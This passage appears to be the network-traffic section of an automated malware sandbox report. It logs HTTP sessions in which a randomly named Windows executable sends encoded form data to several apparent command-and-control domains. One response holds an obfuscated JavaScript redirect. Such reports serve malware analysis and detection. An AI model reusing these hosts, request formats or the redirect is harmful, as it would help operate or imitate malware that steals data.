                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 50 73 70 50 59 61 6c 49 55 52 74 4b 54 4c 4b 33 54 4f 63 54 73 68 35 4f 6e 57 32 77 6c 7a 51 37 54 62 30 38 4a 56 39 38 62 70 35 4e 46 30 6b 34 30 55 77 33 7a 33 67 71 4a 37 57 4b 52 34 36 44 4c 48 4e 69 66 66 6c 54 4a 2b 4d 2b 53 38 59 6a 67 4e 57 36 77 71 59 69 66 70 53 54 79 65 65 4b 63 41 6a 4d 77 43 31 55 47 38 49 75 79 51 6f 2b 74 67 41 49 43 55 62 50 33 64 72 48 41 4b 31 56 41 71 61 2f 4b 48 49 73 75 51 61 48 71 36 31 59 2b 67 32 30 53 49 79 64 7a 64 4e 72 30 35 55 4a [TRUNCATED]
                                                                  Data Ascii: BTPDLZX= [TRUNCATED]
                                                                  Dec 4, 2024 12:51:14.513961077 CET | 1098 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:14 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUhPpNUjioXyUD7OJfPsS5NFvdnMVvDaBEK52pBvXGxf6NzvBp%2Feb%2B4SEWwKiEoJy9l%2BMb53ife7EbIYSOOVl43zEAzsEhnhuLcNQBFwauTDJozz8UOmx5zZYkl0Ok9Omi7dXTWFjq0%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb9558aefe5e64-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2789&min_rtt=2789&rtt_var=1394&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10868&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  24 | 192.168.2.4 | 49935 | 104.21.57.248 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:15.775770903 CET | 488 | OUT | GET /o362/?WnQdf=JhLPW&BTPDLZX=FaNItuPk5TcZ9HdSZBH/qM9rY38VGyvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqDzGT3SCCEwZiMzsN5+71dEwGtSagaXjd4i8= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.rgenerousrs.store
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:51:17.195595026 CET | 1119 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:17 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHce4l%2BPo4yJN2jVNLNVpoyuOZjBNgQXHw8gRGojleO7rzKLhaz9tMObW%2FEZ8njt%2FSaT6Tluoh92DKpjLDUEs6Ut810D9okf7Iqu9j4lKnPD%2BCHdIvFsfvNKbYS3xpa7Rlt5t1YfrKY%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb95695f0243f1-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1675&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>10


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  25 | 192.168.2.4 | 49953 | 154.88.22.101 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:23.026318073 CET | 745 | OUT | POST /jhb8/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.t91rl7.pro
                                                                  Origin: http://www.t91rl7.pro
                                                                  Referer: http://www.t91rl7.pro/jhb8/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 30 37 78 30 43 68 30 66 42 53 6c 75 6c 59 7a 75 64 7a 6b 59 78 48 7a 6f 6c 76 33 30 7a 64 48 43 41 3d 3d
                                                                  Data Ascii: BTPDLZX=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/T07x0Ch0fBSlulYzudzkYxHzolv30zdHCA==
                                                                  Dec 4, 2024 12:51:24.516977072 CET | 364 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:51:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 a6 7e 46 6e b9 3e 79 81 a6 be 11 19 d9 be c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 5c 38 cf c7 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~Fn>yf.6P\8Z0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  26 | 192.168.2.4 | 49960 | 154.88.22.101 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:25.690303087 CET | 765 | OUT | POST /jhb8/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.t91rl7.pro
                                                                  Origin: http://www.t91rl7.pro
                                                                  Referer: http://www.t91rl7.pro/jhb8/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 6a 41 31 69 6d 44 35 77 67 4f 5a 48 37 2f 39 78 47 39 47 48 72 5a 61 48 38 64 50 65 64 69 53 56 51 3d
                                                                  Data Ascii: BTPDLZX=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxjA1imD5wgOZH7/9xG9GHrZaH8dPediSVQ=
                                                                  Dec 4, 2024 12:51:27.188056946 CET | 364 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:51:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 a6 7e 46 6e b9 3e 79 81 a6 be 11 19 d9 be c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 5c 38 cf c7 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~Fn>yf.6P\8Z0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  27 | 192.168.2.4 | 49967 | 154.88.22.101 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:28.364144087 CET | 10847 | OUT | POST /jhb8/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.t91rl7.pro
                                                                  Origin: http://www.t91rl7.pro
                                                                  Referer: http://www.t91rl7.pro/jhb8/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 65 48 75 33 38 65 37 66 69 6e 4c 67 7a 6c 6a 67 32 55 67 42 55 4b 41 55 6e 5a 32 77 65 65 46 6d 6a 6d 41 48 38 58 65 65 52 67 49 43 4b 6d 6f 6c 75 48 45 45 4e 65 66 50 33 2b 4f 6f 73 6d 50 55 57 35 50 67 4c 41 48 5a 65 6c 74 2f 33 71 6a 59 73 6c 32 61 61 43 2f 54 6e 70 7a 71 4f 77 72 4d 4b 44 73 48 65 4c 55 56 2f 55 69 43 56 76 36 4e 56 66 32 35 68 4d 72 2f 58 6f 57 52 4a 76 53 36 50 61 4a 6d 6d 36 61 79 32 68 56 6b 50 47 62 31 35 41 6c 44 74 77 56 51 47 78 31 6b 73 6d 58 2f [TRUNCATED]
                                                                  Data Ascii: BTPDLZX= [TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  28 | 192.168.2.4 | 49973 | 154.88.22.101 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:31.027718067 CET | 481 | OUT | GET /jhb8/?BTPDLZX=0R31+Vq/Nm8msnga4XjSJ8sAfUwJuuARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0Pp97wC6ZYoPeW6DxktAXnOuh3ha64INvKA=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.t91rl7.pro
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:51:32.536885023 CET | 332 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:51:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 35 4e 32 46 6d 4c 6e 51 35 4d 58 68 6b 4d 53 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly85N2FmLnQ5MXhkMS5wcm86ODkxMQ=c=')</script>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  29 | 192.168.2.4 | 49989 | 209.74.77.107 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:38.176188946 CET | 763 | OUT | POST /alu5/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Referer: http://www.learnwithus.site/alu5/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 58 4e 6c 6f 47 32 4a 41 4d 4f 41 62 66 2b 45 70 6a 44 62 49 4a 74 6c 70 79 4a 63 56 30 4f 46 46 64 34 45 4c 31 52 36 41 6e 4a 75 61 71 79 78 76 54 30 76 6e 37 50 78 42 4d 37 36 52 30 63 74 71 2b 52 63 39 38 58 56 77 72 47 4c 58 36 6e 72 6e 35 46 48 76 32 66 43 49 4d 4b 72 79 76 49 4a 57 39 4b 4f 59 79 43 6c 34 4a 2f 42 61 67 66 7a 34 45 53 78 6c 79 6a 44 59 45 44 36 77 6e 66 45 56 52 6a 56 42 59 61 6f 50 79 33 35 55 6b 32 4e 66 41 5a 70 42 33 42 7a 49 30 6a 52 71 73 64 4b 35 39 69 76 79 76 69 34 51 6b 39 71 69 6a 30 38 6c 59 54 37 4c 41 41 3d 3d
                                                                  Data Ascii: BTPDLZX=r+fOQXLoIUMlXNloG2JAMOAbf+EpjDbIJtlpyJcV0OFFd4EL1R6AnJuaqyxvT0vn7PxBM76R0ctq+Rc98XVwrGLX6nrn5FHv2fCIMKryvIJW9KOYyCl4J/Bagfz4ESxlyjDYED6wnfEVRjVBYaoPy35Uk2NfAZpB3BzI0jRqsdK59ivyvi4Qk9qij08lYT7LAA==
                                                                  Dec 4, 2024 12:51:39.434420109 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:39 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  30 | 192.168.2.4 | 49998 | 209.74.77.107 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:40.846318960 CET | 783 | OUT | POST /alu5/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Referer: http://www.learnwithus.site/alu5/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 39 46 64 64 67 4c 30 51 36 41 6b 4a 75 61 68 53 77 45 4e 45 76 53 37 50 74 2f 4d 2b 61 52 30 63 35 71 2b 56 51 39 38 41 42 7a 6f 32 4c 56 32 48 72 70 6d 31 48 76 32 66 43 49 4d 4b 58 4d 76 4d 64 57 39 61 2b 59 79 6a 6c 37 41 66 42 5a 71 2f 7a 34 41 53 77 73 79 6a 43 50 45 42 43 4b 6e 63 73 56 52 6d 35 42 59 49 4d 4d 6f 6e 35 6f 67 32 4e 4a 4d 38 55 59 37 42 47 30 72 52 35 32 6d 73 43 49 31 45 69 6f 2b 54 5a 48 32 39 4f 52 2b 7a 31 52 56 51 47 43 62 48 72 74 43 31 7a 4a 58 6f 30 61 6f 6f 46 6f 48 6b 44 4d 42 34 34 3d
                                                                  Data Ascii: BTPDLZX=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF049FddgL0Q6AkJuahSwENEvS7Pt/M+aR0c5q+VQ98ABzo2LV2Hrpm1Hv2fCIMKXMvMdW9a+Yyjl7AfBZq/z4ASwsyjCPEBCKncsVRm5BYIMMon5og2NJM8UY7BG0rR52msCI1Eio+TZH29OR+z1RVQGCbHrtC1zJXo0aooFoHkDMB44=
                                                                  Dec 4, 2024 12:51:42.097157955 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:41 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
